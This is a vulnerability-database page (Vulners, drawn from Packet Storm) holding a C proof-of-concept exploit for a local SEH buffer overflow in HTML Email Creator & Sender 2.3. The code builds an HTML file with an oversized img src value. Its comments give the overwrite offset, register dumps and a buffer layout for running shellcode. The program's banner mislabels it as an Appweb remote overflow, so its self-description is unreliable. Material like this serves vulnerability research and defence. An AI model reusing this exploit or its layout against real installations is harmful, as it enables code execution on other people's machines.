Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

HTML Email Creator/Sender 2.3 Buffer Overflow

🗓️ 18 Aug 2009 00:00:00Reported by fl0 fl0wType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 17 Views

HTML Email Creator/Sender 2.3 Buffer Overflow Debu

Code
` /*0day HTML Email Creator & Sender v2.3 Local Buffer Overflow(Seh) Poc  
********************************************************************  
Debugging info  
Seh handler is overwriten , the offset is at 60 bytes in our buffer   
so you have to build your buffer as follows:  
[PONTER TO NEXT SEH]-------[SEH HANDLER]----[NOP]------[SHELLCODE]  
| | | |  
JMP 4 bytes POP POP RET 50*0x90 calc.exe   
*********************************************************************  
Code execution is possible.  
CPU Registers  
EAX 00000000  
ECX 00000208  
EDX 00000000  
EBX 00000029  
ESP 0012E224  
EBP 7C8101B1 kernel32.lstrcpynA  
ESI 90909090 <------------------CONTROLED  
EDI 00001209  
EIP 0042E1C7 HtmlEmai.0042E1C7  
*/  
  
#include <stdio.h>  
#include <windows.h>  
#include <string.h>  
#include <getopt.h>  
#include <stdint.h>  
typedef struct Start {  
uint8_t sh;  
uint8_t st;  
uint8_t sm;  
uint8_t sl;  
}HTML;  
  
typedef struct Middle {  
uint8_t sh;  
uint8_t se;   
uint8_t sa;   
uint8_t sd;  
}HEAD;  
  
typedef struct End {  
uint8_t sb;  
uint8_t so;  
uint8_t sD;  
uint8_t sy;  
}BODY;  
#define BUFFERSIZE 0x1A0A  
#define FILESIZE 29A  
#define SRC "<img src="  
void Fbuild(char *fname)  
{ HTML *ht_ml;  
HEAD *he_ad;  
BODY *bo_dy;  
char *memBuffer;  
//"\x48\x54\x4D\x4C" -html  
ht_ml = (HTML*)malloc(sizeof(HTML));  
he_ad = (HEAD*)malloc(sizeof(HEAD));  
bo_dy = (BODY*)malloc(sizeof(BODY));  
memBuffer = (char*)malloc(BUFFERSIZE);  
if(ht_ml == NULL || he_ad == NULL || bo_dy == NULL || memBuffer == NULL) {   
exit(-1);  
}   
ht_ml->sh = 0x48;  
ht_ml->st = 0x54;  
ht_ml->sm = 0x4D;  
ht_ml->sl = 0x4C;  
//second structure  
//HEAD "\x48\x45\x41\x44"  
he_ad->sh = 0x48;  
he_ad->se = 0x45;  
he_ad->sa = 0x41;  
he_ad->sd = 0x44;  
//thierd structure  
//"\x42\x4F\x44\x59"  
bo_dy->sb = 0x42;  
bo_dy->so = 0x4F;  
bo_dy->sD = 0x44;  
bo_dy->sy = 0x59;  
FILE *f;  
f = fopen(fname, "w");  
if( f == NULL) {  
exit(-1);   
}  
int32_t offset = 0;   
memcpy(memBuffer, "<", 1);   
offset += 1;   
memcpy(memBuffer+offset, ht_ml, sizeof(ht_ml));  
offset += sizeof(ht_ml);   
memcpy(memBuffer+offset, ">", 1);   
offset += 1;   
memcpy(memBuffer+offset, "<", 1);  
offset += 1;   
memcpy(memBuffer+offset, he_ad, sizeof(he_ad));  
offset += sizeof(he_ad);  
memcpy(memBuffer+offset, ">", 1);   
offset += 1;  
memcpy(memBuffer+offset, "<", 1);   
offset += 1;  
memcpy(memBuffer+offset, "\\", 1);  
offset += 1;  
memcpy(memBuffer+offset, he_ad, sizeof(he_ad));   
offset += sizeof(he_ad);  
memcpy(memBuffer+offset, ">", 1);  
offset += 1;  
memcpy(memBuffer+offset, "<", 1);  
offset += 1;  
memcpy(memBuffer+offset, bo_dy, sizeof(bo_dy));  
offset += sizeof(bo_dy);  
memcpy(memBuffer+offset, ">", 1);  
offset += 1;  
uint8_t shit[] ={ 0x3C,0x69,0x6D,0x67,0x20,0x73,0x72,0x63,0x3D };  
memcpy(memBuffer+offset, shit, sizeof(shit));  
offset += sizeof(shit);  
memset(memBuffer+offset, 0x22, 1);  
offset += 1;  
memset(memBuffer+offset, 0x41, 4616);  
offset += 4616;  
memset(memBuffer+offset, 0x22, 1);  
offset += 1;  
memcpy(memBuffer+offset, ">", 1);  
offset += 1;  
memcpy(memBuffer+offset, "<", 1);  
offset += 1;  
memcpy(memBuffer+offset, "\\", 1);  
offset += 1;  
memcpy(memBuffer+offset, bo_dy, sizeof(bo_dy));  
offset += sizeof(bo_dy);  
memcpy(memBuffer+offset, ">", 1);  
offset += 1;  
memcpy(memBuffer+offset, "<", 1);   
offset += 1;  
memcpy(memBuffer+offset, "\\", 1);  
offset += 1;  
memcpy(memBuffer+offset, ht_ml, sizeof(ht_ml));   
offset += sizeof(ht_ml);  
memcpy(memBuffer+offset, ">", 1);   
offset += 2;   
fwrite(memBuffer, offset , 1, f);   
fwrite("\x00", 1, 1, f);  
printf("File Done!\n");  
}  
int main(int argc, char *argv[])  
{ char *fname = argv[1];  
system("CLS");   
fprintf(stdout , ":: ::\n");  
fprintf(stdout , "Embedthis Appweb Remote Stack Overflow POC\n");   
fprintf(stdout , "All Credits:fl0 fl0w\n");  
fprintf(stdout , ":: ::\n");  
if(argc < 2) {  
printf("Usage is %s filename.html\n", argv[0]);   
exit(-1);   
}   
Fbuild(fname);  
return 0;   
}   
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Aug 2009 00:00Current
0.9Low risk
Vulners AI Score0.9
htmlemailbuffer overflowdebuggingcode executioncpu registerspoc
17